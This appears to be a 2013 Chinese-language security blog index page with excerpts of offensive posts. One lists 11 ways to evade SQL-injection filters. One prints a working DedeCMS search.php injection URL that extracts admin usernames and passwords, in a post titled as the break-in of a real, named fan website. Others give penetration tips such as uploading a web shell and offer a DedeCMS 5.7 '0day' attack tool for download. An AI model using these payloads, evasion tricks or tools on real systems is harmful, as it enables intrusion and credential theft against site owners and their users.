又是WordPress插件惹的祸：Woopra插件任意文件上传+远程代码执行

WordPress的功能强大之一也就是它的插件多，开发者们为了方便自己也方便那些不懂代码的新手来说安装插件无疑是最简单直接的方法。 但是开发者在开放插件的同时往往只考虑功能是否能够实现其功能，几乎不考虑安全性问题，也正因为插件是开源的原始代码也很容易获取到…

    435    2013-10-24   去围观

绕过防注入的11招

1、运用编码技术绕过 如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 2、通过空格绕过 如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如 or' swords' =‘swords'，由于m…

    394    2013-09-07   去围观

渗透王力宏中文网织梦漏洞

那么直接用下面的exp [code]xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]…

    400    2013-08-14   去围观

网站渗透的一些经验

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！ 2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DB…

    346    2013-08-13   去围观

织梦最新漏洞5.7及利用工具鬼哥dede5.7_0day

织梦开源CMS系统功能强大的同时也存在多处漏洞，这里最近就爆出了最新漏洞5.7版本的可以通杀，这里放出了利用工具看图直接就可以使用。 鬼哥dede5.7_0day.rar

    663    2013-07-31   去围观